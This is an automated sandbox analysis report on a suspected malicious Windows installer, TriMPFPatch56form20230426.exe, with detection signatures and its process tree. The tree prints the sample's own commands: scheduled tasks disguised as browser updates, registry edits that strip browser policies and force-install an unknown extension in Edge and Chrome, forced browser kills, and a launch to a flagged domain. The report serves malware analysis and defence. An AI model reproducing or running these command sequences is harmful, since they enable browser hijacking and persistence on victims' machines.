Windows
Analysis Report
TriMPFPatch56form20230426.exe
Overview
General Information
Detection
Score: 48 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Obfuscated command line found
Found potential ransomware demand text
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Installs a Chrome extension
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64native
- TriMPFPatch56form20230426.exe (PID: 1608 cmdline: C:\Users\user\Desktop\TriMPFPatch56form20230426.exe MD5: A7A5C04005C17D1FA983F835CFFBD183)
- TriMPFPatch56form20230426.tmp (PID: 1800 cmdline: "C:\Users\user\AppData\Local\Temp\is-KJ91B.tmp\TriMPFPatch56form20230426.tmp" /SL5="$40098,857904,780800,C:\Users\user\Desktop\TriMPFPatch56form20230426.exe" MD5: A93A63A9E371AF57AE7FF4D3D1A8068C)
- TriMPFPatch56form20230426.exe (PID: 2580 cmdline: "C:\Users\user\Desktop\TriMPFPatch56form20230426.exe" /SILENT MD5: A7A5C04005C17D1FA983F835CFFBD183)
- TriMPFPatch56form20230426.tmp (PID: 2764 cmdline: "C:\Users\user\AppData\Local\Temp\is-CDM75.tmp\TriMPFPatch56form20230426.tmp" /SL5="$C0240,857904,780800,C:\Users\user\Desktop\TriMPFPatch56form20230426.exe" /SILENT MD5: A93A63A9E371AF57AE7FF4D3D1A8068C)
- EdgeInstall.exe (PID: 3212 cmdline: "C:\Users\user\AppData\Local\MicroApp\EdgeInstall.exe" install MD5: BC44C3F3B1E233CCF83E964193F4CC0D)
- cmd.exe (PID: 3440 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\MicroApp\edge.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- schtasks.exe (PID: 4652 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\MicroApp\reg.xml" /tn MSEdgeUpdate MD5: 796B784E98008854C27F4B18D287BA30)
- cmd.exe (PID: 4728 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\MicroApp\edge.bat" install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- schtasks.exe (PID: 5860 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\MicroApp\reg.xml" /tn MSEdgeUpdate MD5: 796B784E98008854C27F4B18D287BA30)
- cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\MicroApp\reg.bat" install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- schtasks.exe (PID: 6608 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\MicroApp\reg.xml" /tn MSEdgeUpdate MD5: 796B784E98008854C27F4B18D287BA30)
- ChromeInstall.exe (PID: 6624 cmdline: "C:\Users\user\AppData\Local\ServiceApp\ChromeInstall.exe" install MD5: CFBB52F1BD761012D807812DB9566A8B)
- cmd.exe (PID: 3352 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- schtasks.exe (PID: 10040 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate MD5: 796B784E98008854C27F4B18D287BA30)
- cmd.exe (PID: 2680 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- schtasks.exe (PID: 10196 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate MD5: 796B784E98008854C27F4B18D287BA30)
- cmd.exe (PID: 10164 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\ServiceApp\reg.bat" install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 10168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- schtasks.exe (PID: 9964 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate MD5: 796B784E98008854C27F4B18D287BA30)
- chrome.exe (PID: 10120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://getfiles.wiki/welcome.php MD5: 464953824E644F10FFDC9E093FD18F94)
- chrome.exe (PID: 412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,8466965453013657905,1538627999972425382,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 /prefetch:8 MD5: 464953824E644F10FFDC9E093FD18F94)
- EdgeInstall.exe (PID: 372 cmdline: C:\Users\user\AppData\Local\MicroApp\EdgeInstall.exe MD5: BC44C3F3B1E233CCF83E964193F4CC0D)
- cmd.exe (PID: 808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\MicroApp\edge.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- reg.exe (PID: 5548 cmdline: REG DELETE HKLM\SOFTWARE\Policies\Microsoft\Edge /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 6736 cmdline: REG DELETE HKLM\SOFTWARE\Microsoft\Edge\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10096 cmdline: REG DELETE HKLM\SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 1704 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 3484 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Edge\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\MicroApp\apps-helper\apps.crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10216 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Edge\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "version" /t REG_SZ /d 1.0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10180 cmdline: REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10152 cmdline: REG ADD "HKLM\SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\MicroApp\apps-helper\apps.crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 4532 cmdline: REG ADD "HKLM\SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "version" /t REG_SZ /d 1.0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- taskkill.exe (PID: 1720 cmdline: taskkill /F /IM msedge.exe /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- msedge.exe (PID: 1784 cmdline: "C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.31\msedge.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\MicroApp\apps-helper" --hide-crash-restore-bubble MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
- msedge.exe (PID: 10320 cmdline: "C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.31\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=94.0.4606.61 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.31\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=94.0.992.31 --initial-client-data=0xdc,0x100,0x104,0xb8,0x108,0x7ff992a97718,0x7ff992a97728,0x7ff992a97738 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
- msedge.exe (PID: 10400 cmdline: "C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.31\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=94.0.4606.61 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.31\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=94.0.992.31 --initial-client-data=0x168,0x16c,0x170,0x164,0x178,0x7ff7d75faeb0,0x7ff7d75faec0,0x7ff7d75faed0 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
- timeout.exe (PID: 10252 cmdline: timeout 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
- timeout.exe (PID: 10548 cmdline: timeout 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
- timeout.exe (PID: 11020 cmdline: timeout 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
- ChromeInstall.exe (PID: 3420 cmdline: C:\Users\user\AppData\Local\ServiceApp\ChromeInstall.exe MD5: CFBB52F1BD761012D807812DB9566A8B)
- cmd.exe (PID: 10236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 10312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- reg.exe (PID: 10380 cmdline: REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10468 cmdline: REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10492 cmdline: REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10520 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10568 cmdline: REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10616 cmdline: REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "version" /t REG_SZ /d 1.0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10724 cmdline: REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10764 cmdline: REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- reg.exe (PID: 10784 cmdline: REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "version" /t REG_SZ /d 1.0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- taskkill.exe (PID: 10852 cmdline: taskkill /F /IM chrome.exe /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- chrome.exe (PID: 11028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble MD5: 464953824E644F10FFDC9E093FD18F94)
- chrome.exe (PID: 11240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1684,15240012289236370736,6312271980578176923,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:8 MD5: 464953824E644F10FFDC9E093FD18F94)
- timeout.exe (PID: 11104 cmdline: timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
- cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched
AV Detection
Source: Virustotal
Source: ReversingLabs
Source: Avira
Source: Avira URL Cloud
Source: Avira
Source: Avira
Source: ReversingLabs
Source: ReversingLabs
Source: ReversingLabs
Source: ReversingLabs
Source: Static PE information
Source: File opened
Source: Directory created
Source: Static PE information
Source: Static PE information
Source: Code function